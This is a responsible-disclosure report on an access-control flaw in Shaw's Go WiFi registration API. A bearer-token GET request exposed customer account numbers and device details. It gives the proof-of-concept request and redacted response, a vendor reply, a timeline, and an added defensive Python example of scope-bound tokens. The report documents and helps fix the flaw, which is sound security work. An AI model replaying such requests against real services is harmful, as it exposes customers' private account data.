This report was fully disclosed on 23 September 2018

Summary

By sending a GET request to a specific API location it is possible to obtain a customer’s account number in addition to the registered device IDs and MAC addresses of associated Shaw Go Wifi devices.

This attack requires some authentication. For the request to be successful an access_token needs to be generated either from an IP associated with that customer or by remotely logging into a @shaw.ca email associated with that customer.

Proof of Concept

We can generate an access_token by visiting https://wifi-registration.shaw.ca/drp/ and inspecting the response from /api/token.

Request:

GET /api/customer/account/ HTTP/1.1
Host: wifi-registration.shaw.ca
Connection: close
Accept: application/json
Authorization: Bearer [access_token_redacted]
Content-Length: 26

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Aug 2018 13:37:00 GMT
Content-Type: application/json
Content-Length: 381
Connection: close
Set-Cookie: txGUID=████████-████-████-████-████████████; path=/; domain=shaw.ca
Set-Cookie: WiFiCaptivePortalDetails=[REDACTED]; path=/; expires=Fri, 10 Aug 2018 13:37:00 GMT; domain=shaw.ca
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Cache-Control: no-cache
Set-Cookie: captive_env=prod

{"account_id":"03161234567","account_status":"active","device_quota":10,"url":"/accounts/03161234567","downlink_speed":"30","uplink_speed":"5","service_code":"830-137","service_type":"Residential","service_description":"INTERNET 150 PLUS","service_status":"active","quota_available":true,"devices":[],"account_number":"03161234567","response_time":"0.123s","v":"2.9.11-6.899e73c0"}

Some details in this response have been altered or redacted to ensure the privacy of the account owner.

Recommendation

  • Implement proper access controls to prevent information disclosure.
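One way to implement the recommended access control, as an added example that is not Shaw's code and makes no claim about how the real service is built: bind what a bearer token may do to how the caller proved their identity. A token obtained merely by being on the customer's connection (the captive-portal path) gets only the scope needed to register a device; a token obtained with the customer's credentials also gets account:read, and the account handler refuses anything else with 401, matching the post-fix behaviour the report observed. The scope names, the HMAC token format, the signing key and the account record below are all constructed for this example.

```python
"""Scope-bound bearer tokens for a captive-portal style API (constructed example).

Two issuance paths are modelled, mirroring the report:
  * "ip_association" - the caller is on the customer's connection (the /drp/ flow)
  * "email_login"    - the caller authenticated with the customer's credentials
Only the second path may read account details. Scope names, token format and
the signing key are hypothetical, not Shaw's.
"""
import base64
import hashlib
import hmac
import json
import time

# Scopes granted per issuance path (hypothetical policy).
SCOPES_BY_METHOD = {
    "ip_association": {"wifi:register"},
    "email_login": {"wifi:register", "account:read"},
}

# Constructed account record; placeholder values, not real customer data.
ACCOUNTS = {
    "03161234567": {
        "account_id": "03161234567",
        "account_status": "active",
        "device_quota": 10,
        "service_type": "Residential",
        "devices": [],
    }
}

SECRET = b"server-side-signing-key-placeholder"  # constructed; load from a KMS in practice
TOKEN_TTL = 3600  # seconds


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def issue_token(account_id: str, method: str, now=None) -> str:
    """Mint a signed token whose scopes depend on how the caller proved identity."""
    if method not in SCOPES_BY_METHOD:
        raise ValueError(f"unknown issuance method: {method}")
    now = time.time() if now is None else now
    payload = {
        "sub": account_id,                          # which account the token is for
        "scope": sorted(SCOPES_BY_METHOD[method]),  # what it may do
        "amr": method,                              # how identity was proven
        "exp": int(now) + TOKEN_TTL,
    }
    body = _b64(json.dumps(payload, separators=(",", ":")).encode())
    sig = _b64(hmac.new(SECRET, body.encode(), hashlib.sha256).digest())
    return f"{body}.{sig}"


def verify_token(token: str, now=None):
    """Return the payload if the signature and expiry check out, otherwise None."""
    now = time.time() if now is None else now
    try:
        body, sig = token.split(".", 1)
    except ValueError:
        return None
    expected = _b64(hmac.new(SECRET, body.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):
        return None
    payload = json.loads(_unb64(body))
    if payload.get("exp", 0) <= now:
        return None
    return payload


def get_customer_account(authorization_header: str, now=None):
    """Handler for GET /api/customer/account/ with the access control the report asks for.

    Returns (status, body): 401 for a missing, invalid, expired or under-scoped
    token; the account record only when the token carries account:read.
    """
    if not authorization_header.startswith("Bearer "):
        return 401, {"error": "unauthorized"}
    payload = verify_token(authorization_header[len("Bearer "):], now)
    if payload is None or "account:read" not in payload["scope"]:
        return 401, {"error": "unauthorized"}
    # The token's own subject selects the record; no client-supplied account id is trusted.
    account = ACCOUNTS.get(payload["sub"])
    if account is None:
        return 404, {"error": "not found"}
    return 200, account


if __name__ == "__main__":
    portal_token = issue_token("03161234567", "ip_association")
    login_token = issue_token("03161234567", "email_login")
    print("captive-portal token:", get_customer_account("Bearer " + portal_token)[0])
    print("credential token:   ", get_customer_account("Bearer " + login_token)[0])
```

The point of the split is that the captive-portal flow proves only "this request came from the customer's connection", which is enough to register a device but not to reveal the account number and device inventory to whoever happens to be on that network; the handler decides on the token's scope and subject alone, so there is no account id in the request for a caller to vary.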

Remediation Status

At the time of publishing this report, an access_token generated by visiting https://wifi-registration.shaw.ca/drp/ from an IP associated with the customer now results in a 401 Unauthorized response. However, this access token can still be generated by logging in to a @shaw.ca email address associated with that customer.

Furthermore, successful requests now show {"response_time":"0.123s","v":"2.9.12-1.4c02e4ac"}, indicating that the software version has been updated since this report was submitted.

Response From Affected Party

Response From [email protected] 23 Sept 2018

We would like to thank @glitchwitch for bringing this issue to our attention. As a result of this exercise, Shaw’s WiFi device management was able to make security advancements, and we consider this matter resolved.

Regards.

Shaw Customer Protection Team

E: [email protected]

This message is confidential and may contain privileged information. We ask that you not use or disclose this message other than with our consent.

If you are not an intended recipient, please immediately notify us and delete this message. Thank-you.

Timeline

  • 10 August 2018: Affected Party Notified
  • 23 September 2018: Affected Party Released Patch (+44 days)
  • 23 September 2018: Report Published (+44 days)